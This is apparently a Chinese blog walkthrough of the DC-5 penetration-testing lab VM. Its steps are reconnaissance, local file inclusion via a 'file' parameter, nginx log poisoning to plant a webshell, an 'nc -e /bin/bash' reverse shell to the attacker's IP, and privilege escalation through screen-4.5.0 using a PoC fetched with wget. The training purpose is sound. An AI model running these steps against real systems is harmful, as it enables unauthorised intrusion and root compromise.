点我
DC5
DC系列是专门构建的易受攻击的实验室,旨在获得渗透测试领域的经验,目前总共有9个靶机
关注微信公众号:小白学安全,公众号内回复DC,即可获取DC系列靶机镜像!
导入DC5靶机,网络适配器选择NAT模式,确保和kali处于同一IP段!!!
信息收集
确定主机IP地址
netdiscover -i eth0 -r 192.168.84.0/24
端口扫描
nmap 扫描
WEB测试
目录扫描
网页观察
http://192.168.84.181/footer.php 每次刷新都不一样,但是年份为2018、2017、2019、2020
http://192.168.84.181/thankyou.php,同样刷新该界面,年份也会发生变化,但是与footer.php页面相同
猜测有可能thankyou.php包含了页脚
其他页面的页脚都为2019,只有该页面才会随之变化,有可能调用了footer.php
尝试猜测
调用可能是通过file名称进行调用
传参值可能为file
服务器为Linux
对file传参 file=/etc/passwd
读取到文件
利用中间件日志写webshell
当前中间件为nginx,nginx的日志默认路径为
nginx日志文件在路径 /var/log/nginx
日志开关在Nginx配置文件 /etc/nginx/nginx.conf
读取日志配置文件
成功/失败日志记录位置
把木马写入日志中,然后再配合文件包含 拿到shell
随便访问站点的某个网页,放入repeater模块
再次访问http://192.168.84.181/thankyou.php?file=/var/log/nginx/access.log
蚁剑连接
url = http://192.168.84.181/thankyou.php?file=/var/log/nginx/access.log
密码 = 1
连接成功
提权
反弹shell
蚁剑终端:nc -e /bin/bash 192.168.84.174 10086
调用标准终端
python -c "import pty;pty.spawn('/bin/bash')"
查看是否有可用的suid提权
find / -user root -perm -4000 -print 2>/dev/null
观察到有一个screen-4.5.0
关于screen
screen提权
1、搜索相关漏洞及下载poc到本地
2、分析sh文件
开启http服务,将三个文本使用wget下载到/tmp目录下
python -m http.server 10000
3、直接执行./dc5.sh,等待编译成功后查看用户权限
分类:
靶机
版权申明
本文系作者 @小白学安全 原创发布在 xbxaq.com 站点,未经许可,禁止转载!
评论